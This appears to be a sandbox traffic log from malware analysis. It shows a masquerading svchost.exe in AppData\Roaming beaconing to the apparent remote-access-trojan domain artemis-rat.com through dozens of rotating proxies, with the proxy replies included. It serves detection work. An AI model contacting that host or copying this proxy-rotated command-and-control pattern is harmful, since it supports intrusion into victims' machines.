                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.052808046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.802146912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2617192.168.2.55872145.12.30.2318043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.054231882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.208434105 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2618192.168.2.558722104.24.193.1868043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.056499004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.210613012 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2619192.168.2.558577188.166.17.18888143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.063150883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2620192.168.2.55853343.131.246.771567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.063401937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2621192.168.2.558572221.153.92.398043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.065634966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2622192.168.2.558557150.109.243.1561567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.075998068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2623192.168.2.557646185.5.251.142312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.090645075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.802151918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2624192.168.2.55855445.11.95.166600243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.094918966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2625192.168.2.55562136.93.138.74567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.101970911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2626192.168.2.55857982.113.157.1223128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.101970911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2627192.168.2.55859018.135.211.182312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.107889891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.398782015 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2628192.168.2.55582972.167.222.113412543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.111002922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.146059990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.146831989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2629192.168.2.55871838.162.8.232312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.116511106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.527203083 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2630192.168.2.558515103.153.232.41808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.116699934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.942749023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.146413088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.646369934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2631192.168.2.55873234.30.26.177312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.119267941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.646049976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.333656073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.646399021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.146486998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.646730900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2632192.168.2.55859458.234.116.1978043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.133690119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2633192.168.2.558755104.18.81.768043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.140244961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.294259071 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2634192.168.2.55859380.67.8.68043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.142781973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2635192.168.2.558598115.147.26.219808243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.142978907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.880338907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.816102982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.771053076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.504502058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2636192.168.2.558621121.128.194.1548043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.145128965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2637192.168.2.558764104.17.50.458043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.149324894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.306508064 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2638192.168.2.5585465.10.249.159108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.149924040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2639192.168.2.55862647.243.114.192818043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.157043934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2640192.168.2.55862745.120.178.197108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.157526016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2641192.168.2.55787934.23.45.2238043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.167938948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2642192.168.2.55866351.15.205.2231637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.168124914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.833631992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.833754063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.645920992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.146461010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2643192.168.2.558629154.12.178.1072998543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.168282986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2644192.168.2.558773192.154.244.92900043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.168406010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2645192.168.2.558646130.162.213.175312943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.168632030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
